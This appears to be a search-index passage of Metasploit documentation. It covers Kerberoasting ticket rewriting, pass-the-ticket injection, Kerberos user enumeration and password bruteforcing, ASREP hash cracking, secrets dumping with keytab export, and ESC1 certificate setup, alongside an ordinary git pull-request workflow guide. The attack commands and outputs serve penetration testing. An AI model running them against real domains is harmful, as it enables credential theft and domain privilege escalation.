$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 &amp;lt;truncated due to size&amp;gt; 39efa046757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2695476093ddbd087c115e3:N0tpassword! . Rewrite Service Tickets &amp;amp; RAM Injection . Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible to rewrite the ticket with Kerberoast python script. This tactic will allow users to impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege escalation is also possible as the user can be added into an elevated group such as Domain Admins. ➜ kerberoast git:(master) ✗ python3 kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500 . The new ticket can be injected back into the memory with the following Mimikatz command in order to perform authentication with the targeted service via Kerberos protocol. meterpreter &amp;gt; kiwi_cmd kerberos::ptt Administrator.kirbi . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#scenarios"
  },"515": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Kerberos Login/Bruteforce",
    "content": "The auxiliary/scanner/kerberos/kerberos_login module can verify Kerberos credentials against a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. It will also store kerberos tickets that can be used even after the user’s password has been changed. Kerberos accounts which do not require pre-authentication will have the TGT logged for offline cracking, this technique is known as AS-REP Roasting. This module is able to identify the following information from the KDC: . | Valid/Invalid accounts | Locked/Disabled accounts | Accounts with expired passwords, when the password matches | AS-REP Roastable accounts | . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#kerberos-loginbruteforce",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#kerberos-loginbruteforce"
  },"516": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Target",
    "content": "To use the kerberos_login module, make sure you are able to connect to the Kerberos service on a Domain Controller. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#target",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#target"
  },"517": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Scenarios",
    "content": "Creating a single Kerberos ticket (TGT) . To create a single Kerberos ticket (TGT), set the username and password options: . msf6 auxiliary(scanner/kerberos/kerberos_login) &amp;gt; run rhost=192.168.123.133 domain=DEMO.local username=basic_user password=password verbose=true [*] Using domain: DEMO.LOCAL - 192.168.123.133:88 ... [+] 192.168.123.133 - User found: \"basic_user\" with password password [*] Auxiliary module execution completed . Auth Brute . The following demonstrates basic usage, using a custom wordlist, targeting a single Domain Controller to identify valid domain user accounts and additionally bruteforcing passwords: . Create a new ./users.txt file and ./wordlist.txt, then run the module: . msf6 auxiliary(gather/kerberos_enumusers) &amp;gt; run rhost=192.168.123.133 domain=DEMO.local user_file=./users.txt pass_file=./wordlist.txt verbose=true [*] Using domain: DEMO.LOCAL - 192.168.123.133:88 ... [+] 192.168.123.133 - User: \"basic_user\" is present [*] 192.168.123.133 - User: \"basic_user\" wrong password invalid2 [*] 192.168.123.133 - User: \"basic_user\" wrong password p4$$w0rd [*] 192.168.123.133 - User: \"basic_user\" wrong password test_password [+] 192.168.123.133 - User found: \"basic_user\" with password password. Hash: [email protected]:959b983f9cffc093002d9cd8a20...etc... [*] 192.168.123.133 - User: \"foo\" user not found [*] 192.168.123.133 - User: \"foo_bar\" user not found [+] 192.168.123.133 - User: \"Administrator\" is present [*] 192.168.123.133 - User: \"Administrator\" wrong password invalid2 [*] 192.168.123.133 - User: \"Administrator\" wrong password p4$$w0rd [*] 192.168.123.133 - User: \"Administrator\" wrong password test_password [*] 192.168.123.133 - User: \"Administrator\" wrong password password [+] 192.168.123.133 - User: \"no_pre_auth\" does not require preauthentication. Hash: [email protected]:a714f0553589cbd78...etc... [+] 192.168.123.133 - User: \"admin\" is present [*] 192.168.123.133 - User: \"admin\" wrong password invalid2 [*] 192.168.123.133 - User: \"admin\" - Kerberos Error - KDC_ERR_KEY_EXPIRED (23) - Password has expired - change password to reset [*] 192.168.123.133 - User: \"admin\" wrong password test_password [*] 192.168.123.133 - User: \"admin\" wrong password password [*] Auxiliary module execution completed . ASREPRoasting . Accounts that have Do not require Kerberos preauthentication enabled, will receive an ASREP response with a ticket-granting-ticket present. The technique of cracking this ticket offline is called ASREPRoasting. Cracking ASREP response with John: . john ./hashes.txt --wordlist=./wordlist.txt --format:krb5asrep . Cracking ASREP response with Hashcat: . hashcat -m 18200 -a 0 ./hashes.txt ./wordlist.txt . You can see previously cracked creds with: . creds -v . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#scenarios"
  },"518": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Options",
    "content": "The kerberos_login module only requires the RHOST, DOMAIN and USER_FILE options to run. The DOMAIN option . This option is used to specify the target domain. If the domain name is incorrect an error is returned and domain user account enumeration will fail. An example of setting DOMAIN: . set DOMAIN [domain name] . The USER_FILE option . This option is used to specify the file containing a list of user names to query the Domain Controller to identify if they exist in the target domain or not. One per line. An example of setting USER_FILE: . set USER_FILE [path to file] . The PASS_FILE option . If you happen to manage all the found passwords in a separate file, then this option would be suitable for that. One per line. set PASS_FILE [path to file] . The USERPASS_FILE option . If each user should be using a specific password in your file, then you can use this option. One username/password per line: . set USERPASS_FILE [path to file] . The DB_ALL_CREDS option . This option allows you to reuse all the user names and passwords collected by the database: . set DB_ALL_CREDS true . The DB_ALL_PASS option . This option allows you to reuse all the passwords collected by the database. set DB_ALL_PASS true . The DB_ALL_USERS option . This option allows you to reuse all the user names collected by the database. set DB_ALL_USERS true . The Timeout option . This option is used to specify the TCP timeout i.e. the time to wait before a connection to the Domain Controller is established and data read. An example of setting Timeout: . set Timeout [value in seconds] . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#options"
  },"519": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Kerberos login enumeration and bruteforcing",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html"
  },"520": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Keytab",
    "content": "The modules/auxiliary/admin/kerberos/keytab module provides utilities for interacting with MIT keytab files, which can store the hashed passwords of one or more principals. Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced offline. Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors, including the krbtgt encrypted blobs if the AES256 password hash is used - which is described in more detail below. ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#keytab",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#keytab"
  },"521": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Actions",
    "content": "The following actions are supported: . | LIST - List the entries in the keytab file [Default] | ADD - Add a new entry to the keytab file | EXPORT - Export known Kerberos encryption keys from the database | . ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#actions"
  },"522": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Scenarios",
    "content": "List . msf6 auxiliary(admin/kerberos/keytab) &amp;gt; run keytab_file=./example.keytab Keytab entries ============== kvno type principal hash date ---- ---- --------- ---- ---- 1 18 (AES256) [email protected] 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100 [*] Auxiliary module execution completed . Add . Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the auxiliary/gather/windows_secrets_dump module: . msf6 auxiliary(admin/kerberos/keytab) &amp;gt; run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c [*] modifying existing keytab [+] keytab entry added to ./example.keytab . Adding entries using a specified password: . msf6 auxiliary(admin/kerberos/keytab) &amp;gt; run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd [*] modifying existing keytab [*] Generating key with salt: DEMO.LOCALAdministrator. The SALT option can be set manually [+] keytab entry added to ./example.keytab . Export . Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump . # Secrets dump msf6 &amp;gt; use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) &amp;gt; run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ... omitted ... # Kerberos keys: Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea Administrator:des-cbc-md5:ad49d9d92f5da170 Administrator:des-cbc-crc:ad49d9d92f5da170 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da krbtgt:des-cbc-md5:3ddf2f627c4cbcdc ... omitted ... [*] Auxiliary module execution completed # Export to keytab msf6 auxiliary(gather/windows_secrets_dump) &amp;gt; use admin/kerberos/keytab msf6 auxiliary(admin/kerberos/keytab) &amp;gt; run action=EXPORT keytab_file=./example.keytab [+] keytab saved to ./example.keytab Keytab entries ============== kvno type principal hash date ---- ---- --------- ---- ---- 1 1 (DES_CBC_CRC) [email protected] 3e5d83fe4594f261 1970-01-01 01:00:00 +0100 1 17 (AES128) ADF3\\[email protected] 967ccd1ffb9bff7900464b6ea383ee5b 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) ADF3\\[email protected] 62336164643537303830373630643133 1970-01-01 01:00:00 +0100 1 18 (AES256) [email protected] 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100 1 17 (AES128) [email protected] df990c21c4e8ea502efbbca3aae435ea 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) [email protected] ad49d9d92f5da170 1970-01-01 01:00:00 +0100 1 1 (DES_CBC_CRC) [email protected] ad49d9d92f5da170 1970-01-01 01:00:00 +0100 1 18 (AES256) [email protected] e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100 1 17 (AES128) [email protected] ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) [email protected] 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100 ... omitted ... [*] Auxiliary module execution completed . Decrypting Kerberos traffic in wireshark . The Kerberos protocol makes use of encrypted values which will show as an opaque blob of hex characters in Wireshark. Configuring Wireshark with a Keytab file can decrypt these values automatically. For instance in a TGS-REQ request within Wireshark, the cipher below is encrypted using the user account’s password and is not human readable: . tgs-req pvno: 5 msg-type: krb-tgs-req (12) padata: 1 item PA-DATA pA-TGS-REQ padata-type: pA-TGS-REQ (1) padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230… ap-req pvno: 5 msg-type: krb-ap-req (14) Padding: 0 ap-options: 00000000 ticket authenticator etype: eTYPE-ARCFOUR-HMAC-MD5 (23) cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985… ^^^^^^^^^^^^^^ Value encrypted using the user account's password . The easiest way to decrypt these opaque blobs is to generate a Keytab file with Metasploit using the secretsdump scenario above or similar. After generating a keytab file in the Wireshark GUI go to Edit -&amp;gt; Preferences -&amp;gt; Protocols -&amp;gt; KRB5 and modify the following options: . | Set try to decrypt Kerberos blobs to true | Set the Kerebros keytab file to the keytab file generated by your domain controller | . After confirming the new settings - the previously encrypted which were signed with the user’s password, and the decryptable session key should be viewable in Wireshark. For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane: . tgs-req pvno: 5 msg-type: krb-tgs-req (12) padata: 1 item PA-DATA pA-TGS-REQ padata-type: pA-TGS-REQ (1) padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230… ap-req pvno: 5 msg-type: krb-ap-req (14) Padding: 0 ap-options: 00000000 ticket authenticator etype: eTYPE-ARCFOUR-HMAC-MD5 (23) cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985… Decrypted keytype 23 usage 7 using learnt encASRepPart_key in frame 475 (id=475.1 same=0) (f161f360...) # ... authenticator authenticator-vno: 5 crealm: ADF3.LOCAL cname name-type: kRB5-NT-PRINCIPAL (1) cname-string: 1 item CNameString: a cusec: 303247 ctime: 2022-04-10 15:21:31 (UTC) ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file . If you have exported the krbtgt account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account. Additional details: https://wiki.wireshark.org/Kerberos . If you are on a Windows domain controller it is possible to use the ktpass program to generate keytab files: . ktpass /crypto All /princ [email protected] /pass p4$$w0rd /out demo.keytab /ptype KRB5_NT_PRINCIPAL . It is easier to use the Metasploit module, but if you do use ktpass - be aware of the following issues: . | If the password contains $ it is easier to run the ktpass command in cmd rather than powershell to avoid unexpected variable substitution | If there is a Missing keytype 18 warning for etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18) in Wireshark - verify that the principal name is correct within the ktpass generation command . | This should match the initial AS-REQ KRB ERROR salt, found in krb-error -&amp;gt; edata -&amp;gt; ETYPE-INFO2-ENTRY -&amp;gt; salt | . | . Common Mistakes . Invalid REALM/PRINCIPAL/SALT . When generating a keytab with a password, a salt is generated by default from the principal and realm unless one is explicitly provided. For Windows Active Directory environments, these values are case-sensitive. The realm should be upper case, and the principal is case-sensitive. When the SALT is not explicitly provided a salt will be generated that follows the Windows naming convention, for instance: . REALM.EXAMPLEAdministrator . ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html#scenarios"
  },"523": {
    "doc": "Keytab support and decrypting wireshark traffic",
    "title": "Keytab support and decrypting wireshark traffic",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/keytab.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/keytab.html"
  },"524": {
    "doc": "Landing Pull Requests",
    "title": "The short story",
    "content": ". | Configure your git environment as described here. | Add the fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* line to your .git/config. | Add your signing key git config --global user.signingkey . | Use gpg --list-keys to view your available keys. Note that on certain systems you may need to replace gpg with gpg2. Sample output can be seen below: . pub rsa4096 2020-04-07 [SC] 3198961E148FF5E527E31A5FD35E05C0F2B81E83 uid [ultimate] Grant Willcox &amp;lt;[email protected]&amp;gt; sub rsa4096 2020-04-07 [E] . | Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute: . git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83 . | . | When merging code from a pull request, always, always merge -S --no-ff --edit, and write a meaningful 50/72 commit message that references the original PR as #1234 (not PR1234, not PR#1234, not 1234). For example, your message should look like this: . Land #1234, a whizbang bug fix Adds a whiz to the existing bang. It appears that without this, bad things can occasionally happen. Thanks @mcfakepants! Fixes #1024, also see #999. | The -S flag indicates that you’re going to sign the merge with your PGP/GPG key, which is a nice assurance that you’re really you. | The --no-ff flag indicates that you want to create a merge commit no matter what, even if the merge would normally be resolved as a fast forwards. This ensure that all changes have a commit associated with them. | The --edit flag will drop you into your default editor (normally vim), and will allow you to edit the commit message so that it conforms to Metasploit standards, rather than sticking with git’s pre-generated commit message which does not. | . | Note that the --no-ff flag should be used both for PRs that go back to a contributor’s branch as well as PRs that land in Metasploit’s master branch. | If you’re making changes (often the case), merge to a landing branch, then merge that branch to upstream/master with the -S --no-ff --edit options. | . ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#the-short-story",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#the-short-story"
  },"525": {
    "doc": "Landing Pull Requests",
    "title": "Handy Git aliases",
    "content": "Check out this gist that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#handy-git-aliases",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#handy-git-aliases"
  },"526": {
    "doc": "Landing Pull Requests",
    "title": "Fork and clone",
    "content": "First, fork and clone the rapid7/metasploit-framework repo, following these instructions. I like using ssh with ~/.ssh/config aliases as described here, but the https method will work, too. Once this is done, you will have a remote repository called “origin,” which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7’s fork. Now, we’re going to add an “upstream” repository to talk to the Rapid7 repository. In addition, we’re going to add a magical line to the config file that will let us see all pull requests against the Rapid7 repo (both open and closed). Note that this will take a minute since you’re adding some hundreds of megs to your clone’s refs. So, open up metasploit-framework/.git/config with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7’s forks. In the end, you should have a section that started off like this: . [remote \"upstream\"] fetch = +refs/heads/*:refs/remotes/upstream/* fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* url = https://github.com/rapid7/metasploit-framework . And now it looks like this: . [remote \"upstream\"] fetch = +refs/heads/*:refs/remotes/upstream/* fetch = +refs/pull/*/head:refs/remotes/upstream/pr/* url = [email protected]:rapid7/metasploit-framework.git [remote \"origin\"] fetch = +refs/heads/*:refs/remotes/origin/* fetch = +refs/pull/*/head:refs/remotes/origin/pr/* url = https://github.com/YOURNAME/metasploit-framework . Some people like to copy these over into remotes named “rapid7” and “yourusername” just so they don’t have to remember about “origin” and “upstream,” but for this doc, we’ll just assume you have “origin” and “upstream” defined like this. Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right? . $ git fetch --all Fetching todb-r7 remote: Counting objects: 13, done. remote: Compressing objects: 100% (1/1), done. remote: Total 7 (delta 6), reused 7 (delta 6) Unpacking objects: 100% (7/7), done. From https://github.com/todb-r7/metasploit-framework * [new ref] refs/pull/1/head -&amp;gt; origin/pr/1 * [new ref] refs/pull/2/head -&amp;gt; origin/pr/2 Fetching upstream remote: Counting objects: 91, done. remote: Compressing objects: 100% (29/29), done. remote: Total 59 (delta 47), reused 42 (delta 30) Unpacking objects: 100% (59/59), done. From https://github.com/rapid7/metasploit-framework [... bunches of tags and PRs ...] * [new ref] refs/pull/1701/head -&amp;gt; upstream/pr/1701 * [new ref] refs/pull/1702/head -&amp;gt; upstream/pr/1702 . You can git fetch a remote any time, and you’ll get access to the latest changes to all branches and pull requests. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#fork-and-clone",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#fork-and-clone"
  },"527": {
    "doc": "Landing Pull Requests",
    "title": "Branching from PRs",
    "content": "A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would: . $ git checkout upstream/pr/1217 Note: checking out 'upstream/pr/1217'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b new_branch_name HEAD is now at 9e499e5... Make BindTCP test more robust ((no branch)) todb@mazikeen:~/git/rapid7/metasploit-framework . $ git checkout -b landing-1217 . Now, we’re on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor’s GitHub username and branch name on GitHub), or if there aren’t any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7’s repo, this is where you land them to the upstream repo). In this particular case with PR #1217, I did want to send some changes back to the contributor. Important: If the codebase the contributor’s PR is based on is severely outdated (e.g., they branched off an outdated master), you should not test their PR in isolation as described above. Instead, you should create a test branch that is identical to the latest codebase, merge the contributor’s PR into the test branch, and then start your testing. You may need to bundle install to ensure you’re using the right gems. Here’s an example with #6954 (your workflow may vary): . $ git checkout upstream/master Note: checking out 'upstream/master'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b &amp;lt;new-branch-name&amp;gt; HEAD is now at afbeb2b... Land #7023, fixes for swagger exploit $ git merge --no-ff --no-edit upstream/pr/6954 Merge made by the 'recursive' strategy. modules/exploits/windows/local/payload_inject.rb | 5 +++++ 1 file changed, 5 insertions(+) [*] Running msftidy.rb in .git/hooks/post-merge mode --- Checking new and changed module syntax with tools/dev/msftidy.rb --- modules/exploits/windows/local/payload_inject.rb - msftidy check passed ------------------------------------------------------------------------ . This ensures that the contributor’s PR is being tested against the latest codebase and not an outdated one. If you do not do this, when you land the PR, you may end up breaking Metasploit. Note that the example above will leave you in a detached HEAD state. This is fine if you just want to test the module in question, however if you want to make any changes, don’t forget to make a new branch. For the example above this could be done by running the following command: . git checkout -b land-6594 . ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#branching-from-prs",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#branching-from-prs"
  },"528": {
    "doc": "Landing Pull Requests",
    "title": "Checking out branches from a remote forked repo in your forked repo",
    "content": "After your .git/config is set up per the above, and you successfully run git fetch --all, you are two steps away from being able to check out a branch from a contributor’s forked repo. You need to add their fork once as a remote: git remote add OTHER_USER git://github.com/OTHER_USER/metasploit-framework.git. Now pull down the latest from them: git fetch OTHER_USER. Now you can check out branches from OTHER_USER per usual, e.g. git checkout bug/foo. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#checking-out-branches-from-a-remote-forked-repo-in-your-forked-repo",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#checking-out-branches-from-a-remote-forked-repo-in-your-forked-repo"
  },"529": {
    "doc": "Landing Pull Requests",
    "title": "Making changes",
    "content": "$ gvim .gitignore [... make some changes and some commits ...] (landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework $ git checkout -b pr1217-fix-gitignore-conflict Switched to a new branch 'pr1217-fix-gitignore-conflict' (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework $ git push origin pr1271-fix-gitignore-conflict (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework $ git pr-url schierlm javapayload-maven Created new window in existing browser session. This sequence does a few things after editing .gitconfig. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka “origin”). Finally, I have a mighty .gitconfig alias here to open a browser window to send a pull request to the original contributor’s branch (you will want to edit yours to reflect your real GitHub username, of course). pr-url = !\"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH\" . Filling in the blanks (provided by the original PR’s information from GitHub) gets me: . https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict . I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once @schierlm landed it on his branch (again, using git merge --no-ff and a short, informational merge commit message), all I (or anyone) had to do was git fetch to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#making-changes",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#making-changes"
  },"530": {
    "doc": "Landing Pull Requests",
    "title": "Collaboration between contributors",
    "content": "Note the important bit here: you do not need commit rights to Rapid7 to branch pull requests. If Alice knows a solution to Bob’s pull request that Juan pointed out, it is easy for Alice to provide that solution by following the procedure above. git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice’s changes, and Juan doesn’t have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was. The hardest part is remembering how to construct the pull request to Bob – lucky for you, this .git/config alias makes that part pretty push-button. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#collaboration-between-contributors",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#collaboration-between-contributors"
  },"531": {
    "doc": "Landing Pull Requests",
    "title": "Landing to upstream",
    "content": "Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else (@jlee-r7) was able to to do something like this: . $ git fetch upstream remote: Counting objects: 12, done. remote: Compressing objects: 100% (2/2), done. remote: Total 7 (delta 5), reused 7 (delta 5) Unpacking objects: 100% (7/7), done. From https://github.com/rapid7/metasploit-framework 9e499e5..263e967 refs/pull/1651/head -&amp;gt; upstream/pr/1651 . This all looked good, so he could land this to Rapid7’s repo with: . $ git checkout -b upstream-master --track upstream/master $ git merge -S --no-ff --edit landing-1217 $ git push upstream upstream-master:master . Or, if he already have upstream-master checked out: . $ git checkout upstream-master $ git rebase upstream/master $ git merge -S --no-ff --edit landing-1217 $ git push upstream upstream-master:master . The --edit is optional if we have our editor configured correctly in $HOME/.gitconfig. The point here is that we always want a merge commit, and we never want to use the (often useless) default merge commit message. For #1217, this was changed to: . Land #1217, java payload build system refactor . Note that you should rebase before landing – otherwise, your merge commit will be lost in the rebase. Finally, the -S indicates we are going to sign the merge, using our GPG key. This is a nice way to prove in a secure way that this merge is, in fact, coming from you, and not someone impersonating you. For more on signing merges, see A Git Horror Story: Repository Integrity With Signed Commits. To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries: . [user] name = Your Name email = [email protected] signingkey = DEADBEEF # Must match exactly with your key for \"Your Name &amp;lt;[email protected]&amp;gt;\" [alias] c = commit -S --edit m = merge -S --no-ff --edit . People with commit rights to rapid7/metasploit-framework will have their keys listed here. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#landing-to-upstream",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#landing-to-upstream"
  },"532": {
    "doc": "Landing Pull Requests",
    "title": "Post-Merge",
    "content": "After a pull request has been merged, release notes should be added to the pull request in the form of a comment. These release notes will automatically be extracted and used as documentation when creating the metasploit release notes. Release note examples: . | 12873 Release notes | 12831 Release notes | . The rn-no-release-notes label must be added if there are no release notes for the merged pull request. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#post-merge",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#post-merge"
  },"533": {
    "doc": "Landing Pull Requests",
    "title": "Merge conflicts",
    "content": "The nice thing about this strategy is that you can test for merge conflicts straight away. You’d use a sequence like: . git checkout upstream/pr/1234 git checkout -b landing-1234 git checkout master git checkout -b master-temp git merge landing-1234 master-temp . If that works, great, you know you don’t have any merge conflicts right now. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#merge-conflicts",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#merge-conflicts"
  },"534": {
    "doc": "Landing Pull Requests",
    "title": "Questions and Corrections",
    "content": "Reach out in #contributors on Metasploit Slack, or by e-mailing msfdev at metasploit dot com. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html#questions-and-corrections",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html#questions-and-corrections"
  },"535": {
    "doc": "Landing Pull Requests",
    "title": "Landing Pull Requests",
    "content": "This page is meant for Committers. If you are unsure whether you are a committer, you are not. Metasploit is built incrementally by the community through GitHub’s Pull Request mechanism. Submitting pull requests (or PRs) is already discussed in the Dev environment setup documentation. It’s important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly. ",
    "url": "/docs/development/maintainers/process/landing-pull-requests.html",
    "relUrl": "/docs/development/maintainers/process/landing-pull-requests.html"
  },"536": {
    "doc": "Vulnerable cert finder",
    "title": "Vulnerable Application",
    "content": "The auxiliary/gather/ldap_esc_vulnerable_cert_finder module allows users to query a LDAP server for vulnerable certificate templates and will print these certificates out in a table along with which attack they are vulnerable to and the SIDs that can be used to enroll in that certificate template. Additionally the module will also print out a list of known certificate servers along with info about which vulnerable certificate templates the certificate server allows enrollment in and which SIDs are authorized to use that certificate server to perform this enrollment operation. Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates. Installing AD CS . | Install AD CS on either a new or existing domain controller | Open the Server Manager | Select Add roles and features | Select “Active Directory Certificate Services” under the “Server Roles” section | When prompted add all of the features and management tools | On the AD CS “Role Services” tab, leave the default selection of only “Certificate Authority” | Completion the installation and reboot the server | Reopen the Server Manager | Go to the AD CS tab and where it says “Configuration Required”, hit “More” then “Configure Active Directory Certificate…” | Select “Certificate Authority” in the Role Services tab | Keep all of the default settings, noting the “Common name for this CA” value on the “CA Name” tab. | Accept the rest of the default settings and complete the configuration | . Setting up a ESC1 Vulnerable Certificate Template . | Open up the run prompt and type in certsrv. | In the window that appears you should see your list of certification authorities under Certification Authority (Local). | Right click on the folder in the drop down marked Certificate Templates and then click Manage. | Scroll down to the User certificate. Right click on it and select Duplicate Template. | From here you can refer to https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md for screenshots. | Select the General tab and rename this to something meaningful like ESC1-Template, then click the Apply button. | In the Subject Name tab, select Supply in the request and click Ok on the security warning that appears. | Click the Apply button. | Scroll to the Extensions tab. | Under 